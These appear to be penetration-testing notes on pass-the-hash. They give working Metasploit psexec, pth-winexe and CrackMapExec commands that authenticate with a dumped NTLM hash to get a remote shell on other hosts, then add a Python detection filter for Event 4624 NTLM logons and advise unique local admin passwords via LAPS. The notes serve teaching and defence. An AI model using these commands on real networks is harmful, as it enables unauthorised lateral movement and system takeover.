Pass-the-hash

MSF:

msf exploit(psexec) > set SMBUser mike
msf exploit(psexec) > set SMBPass LMHASH:NTHASH    (if you only have one of the two hashes, place 32 0's on the other side of the :)
msf exploit(psexec) > run

Pass-the-hash allows an attacker to authenticate to a remote target using a valid combination of username and NTLM/LM hash instead of a cleartext password. This works because NTLM/LM password hashes are not salted: the same username and password produce the same hash on every computer and in every session.

Consider the following scenario: an organization uses disk-imaging technologies within its network, or otherwise has the same local administrative user enabled on multiple computers. A vulnerability on one of these computers has given us SYSTEM privileges, with which we dumped the local LM and NTLM hashes. We copy the local administrator NTLM hash and use it in place of a password with a patched version of winexe (pth-winexe) to gain a shell on a different machine that has the same local administrator username/password combination. We begin by setting an environment variable called SMBHASH containing the LM:NTLM hash pair we want to authenticate with.

# export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896

We can then run pth-winexe, which picks up the hash from SMBHASH in place of a password, to obtain a remote command prompt on the target machine:

# pth-winexe -U administrator% //10.11.01.76 cmd

With CrackMapExec, the hash is passed with -H, either as the LM:NT pair or as the NT hash alone:

# crackmapexec smb <target(s)> -u username -H LMHASH:NTHASH

# crackmapexec smb <target(s)> -u username -H NTHASH
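From the target host's side, every variant above produces the same footprint: a successful network logon (Event ID 4624, LogonType 3) authenticated with the NTLM package to a host-local account from a remote address. The following Python triage filter is an added example, not code from the original notes or from any of the tools it mentions; it uses the standard 4624 field names, but the flattened record shape, the "Computer" field and all sample values are constructed assumptions.

```python
# Added example: triage filter for the logon pattern that pass-the-hash over SMB
# leaves on the target. Record shape and sample values are constructed, not real.

# Constructed 4624 (successful logon) records, flattened the way log shippers
# commonly emit Windows Security events. "Computer" is the host that logged them.
SAMPLE_EVENTS = [
    # Domain user over Kerberos: ordinary traffic, not flagged.
    {"Computer": "WS07", "EventID": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "mike",
     "TargetDomainName": "CORP", "IpAddress": "10.0.0.5", "WorkstationName": "WS01"},
    # Host-local "administrator" of WS07 reached over the network with NTLM from
    # another machine: the shared local admin scenario described above.
    {"Computer": "WS07", "EventID": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "administrator",
     "TargetDomainName": "WS07", "IpAddress": "10.0.0.99", "WorkstationName": "LAB-PC"},
    # Same local account at the console (LogonType 2): not a network logon.
    {"Computer": "WS07", "EventID": 4624, "LogonType": 2,
     "AuthenticationPackageName": "Negotiate", "TargetUserName": "administrator",
     "TargetDomainName": "WS07", "IpAddress": "-", "WorkstationName": "WS07"},
    # Anonymous NTLM logon (null session noise): excluded.
    {"Computer": "WS07", "EventID": 4624, "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "TargetUserName": "ANONYMOUS LOGON",
     "TargetDomainName": "NT AUTHORITY", "IpAddress": "10.0.0.12", "WorkstationName": "-"},
]

LOCAL_SOURCES = {"-", "127.0.0.1", "::1"}

def is_remote_ntlm_local_logon(ev):
    """True for a successful NTLM network logon to a host-local account
    (TargetDomainName equals the logging host) from a remote address."""
    if ev.get("EventID") != 4624 or ev.get("LogonType") != 3:
        return False
    if ev.get("AuthenticationPackageName", "").upper() != "NTLM":
        return False
    user = ev.get("TargetUserName", "")
    if user.upper() == "ANONYMOUS LOGON" or user.endswith("$"):
        return False  # null sessions and machine accounts are not this pattern
    if ev.get("TargetDomainName", "").upper() != ev.get("Computer", "").upper():
        return False  # domain account: outside this local-account check
    return ev.get("IpAddress", "-") not in LOCAL_SOURCES

def find_candidates(events):
    """Return (host, user, source ip, source workstation) tuples worth triage."""
    return [(ev["Computer"], ev["TargetUserName"], ev["IpAddress"], ev["WorkstationName"])
            for ev in events if is_remote_ntlm_local_logon(ev)]

if __name__ == "__main__":
    for host, user, ip, ws in find_candidates(SAMPLE_EVENTS):
        print("NTLM network logon to local account %s on %s from %s (%s)" % (user, host, ip, ws))
```

Legitimate administration tooling produces the same logons, so treat hits as triage leads to correlate with the source host rather than as alerts on their own. The root cause in the scenario, one local administrator password shared across hosts, is removed by giving every host a unique local administrator password (for example with LAPS).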
